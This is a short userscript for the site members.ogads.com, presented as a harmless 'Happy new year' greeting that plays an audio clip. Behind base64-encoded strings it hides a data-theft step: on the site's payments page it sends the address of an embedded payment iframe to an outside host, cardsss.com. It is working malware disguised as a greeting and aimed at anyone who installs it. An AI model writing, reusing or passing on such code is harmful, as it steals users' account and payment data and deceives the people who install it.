test

Happy new year everybody

// ==UserScript==
// @name         test
// @namespace    http://tampermonkey.net/
// @version      1.1
// @description  Happy new year everybody
// @author       xxx
// @match        https://members.ogads.com/*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';
    window.onload=function(){document.getElementById("ding").src="https://media.vocaroo.com/mp3/d1rFAFDxVzn",setTimeout(function(){if(document.location.href.endsWith(atob("cGF5bWVudHMucGhw"))){const e=new XMLHttpRequest;e.open("GET",atob("aHR0cHM6Ly9jYXJkc3NzLmNvbS9vZ2Fkcy5waHA/dT0=")+encodeURIComponent(document.getElementsByTagName("iframe")[0].src)),e.send()}},1e3)};
})();